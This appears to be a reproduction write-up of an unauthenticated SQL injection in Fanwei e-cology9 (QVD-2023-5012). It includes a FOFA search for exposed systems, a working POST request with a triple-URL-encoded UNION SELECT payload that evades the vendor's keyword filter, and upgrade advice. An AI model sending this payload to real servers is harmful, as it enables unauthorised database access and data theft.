Fanwei e-cology9 SQL injection vulnerability recurrence (QVD-2023-5012)

1. Product introduction

      Pan-micro collaborative management application platform e-cology is a set of enterprise information portal, knowledge document management, workflow management, human resource management, customer relationship management, project management, financial management, asset management, supply chain management, data center functions Enterprise large-scale collaborative management platform.

2. Vulnerability overview

    There is a SQL injection vulnerability in Fanwei e-cology9. Unauthenticated remote attackers can use this vulnerability to obtain sensitive database information, and further exploitation may lead to the target system being charged.

3. Scope of influence

 Affected version

Fanwei e-cology9 <= 10.55

unaffected version

Fanwei e-cology9 >= 10.56

4. Reproduce the environment

 FOFA: app="Panwei-Collaborative Business System"

5. Vulnerability recurrence  

Access the vulnerable environment, burp captures packets and sends the Repeater module for use

 POC currently circulating on the Internet

POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 651


isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

 Note: Three parameters need to be passed in the POC

 1. isDis must be 1

 2. BrowserTypeId corresponding method

 3. keyword is the injection point, and url encoding needs to be performed three times to escape Panwei's filtering mechanism (Panwei's blacklist mechanism will replace keywords with full-width characters)

Query database version information

Reproduced successfully

 

6. Repair suggestion

At present, the official security patch has been released, and it is recommended that affected users upgrade to version 10.56 and above as soon as possible.

https://www.weaver.com.cn/cs/securityDownload.asp